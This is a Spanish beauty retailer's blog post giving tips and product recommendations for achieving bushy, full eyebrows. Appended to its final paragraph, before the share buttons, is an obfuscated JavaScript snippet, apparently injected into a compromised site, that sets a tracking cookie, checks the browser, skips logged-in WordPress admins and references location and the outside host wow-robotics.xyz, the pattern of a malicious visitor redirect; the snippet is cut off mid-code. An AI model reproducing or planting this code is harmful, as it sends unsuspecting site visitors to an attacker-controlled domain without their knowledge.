No nos cansaremos de repetirlo: ¡las cejas son tendencia! Frondosas, anchas, desenfadadas, despeinadas, pobladas, salvajes… ¡nos encantan! Por eso, en el artículo de hoy os vamos a enseñar cómo seguir la tendencia en cejas del año cejas. Busshy Brows, Lion Mane o simplemente tupidas están en todas las revistas, pasarelas y nuestros perfiles favoritos. Qué lejos quedan las cejas ultra depiladas o las excesivamente angulosas. Toca tomar nota y coger un espejo porque… ¡empezamos!

 

chica joven mira a camara con una media sonrisa los coloretes y ojos maquillados en tonos naranja

Cómo conseguir unas cejas más tupidas

Si queremos conseguir que nuestras cejas luzcan tupidas lo primero que deberemos hacer será peinarlas ¿Cómo? Hacia arriba y hacia fuera. El lápiz STYLO SOURCILS WATERPROOF de CHANEL, además de ser muy fácil de aplicar y de tener un grosor modulable, incluye el peine de cejas perfecto para esta tarea. Otros consejos que deberemos tener en cuenta para cuidar nuestras cejas serán no depilarlas en exceso, aunque al principio cueste, pensar en la forma del rostro, mantenerlas lo más natural posible y mimarlas mucho.  Un secreto que nos encanta contar a nuestras clientas y que sirve para mantener unas cejas cuidadas, suaves y protegidas de las agresiones externas, es RevitaBrow Advanced de Revitalash. Un auténtico aliado para el resurgir de vuestras cejas ¡hasta de las más tímidas y finas!

Cómo dar forma y volumen a las cejas

Para conseguir unas cejas a la moda vamos a darles forma para que adquieran un aspecto naturalmente salvaje (¿qué bien suena no?) En Instagram no, pero en la vida real existen dos tipos de personas, las que tienen unas cejas muy pobladas y las que no. Las primeras están de enhorabuena, solo necesitan tener claro la forma que desean conseguir y depilarlas. Para las segundas el asunto se complica. Además de darles forma, hay que maquillarlas para crear sensación de frondosidad. Tranquilas, no se trata de aprender técnicas de la pintura Prerafaelista del siglo XIX, ¡es mucho más fácil! Las plantillas reutilizables Brow Stencils de Eylure lo hacen por vosotras, ¡truquito de regalo!

 

chica se maquilla las cejas frente a un espejo redondo sobre una mesa

Con la plantilla o con una regla, pasaremos a definir la forma utilizando con un lápiz con un color un poco superior al de nuestro cabello. Por seguir con un único producto, el STYLO SOURCILS WATERPROOF de CHANEL (del que os hablamos un poco más arriba) incluye en su otro extremo un precioso lápiz que facilita mucho el proceso. Lo difícil es conseguir que la otra ceja sea lo más simétrica posible, pero si miramos el lado bueno, durante las primeras veces las risas están aseguradas.  No os desaniméis, con las plantillas y un lápiz de calidad como el que os hemos recomendado seguro que os salen casi a la primera.

Ahora que lo complicado ha pasado, toca aumentar el volumen de nuestras cejas  y… ¡nada más! Para ello, la máscara de cejas DIORSHOW PUMP `N`BROW consigue un aspecto mucho más tupido y natural sin grandes movimientos ni triples saltos mortales: aplicar y listo. A nosotras nos encanta porque, además que no se nota nada, es el que usan en el Backstage de los desfiles de DIOR.

una chica mira seria al frente mientras unas manos maquillan sus cejas

Estos han sido nuestros consejos para llevar unas cejas tupidas bien hechas, el resto es ensayo y error ¡como todo en la vida! Eso sí, os aseguramos que, una vez conseguido, pasará a convertirse en el centro de todos vuestros looks y maquillajes. Si sabéis cómo hacerlo o tenéis alguna duda concreta estaremos encantadas de ayudaros por aquí, en nuestras redes sociales o en tienda. ¡Nos vemos muy pronto! var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone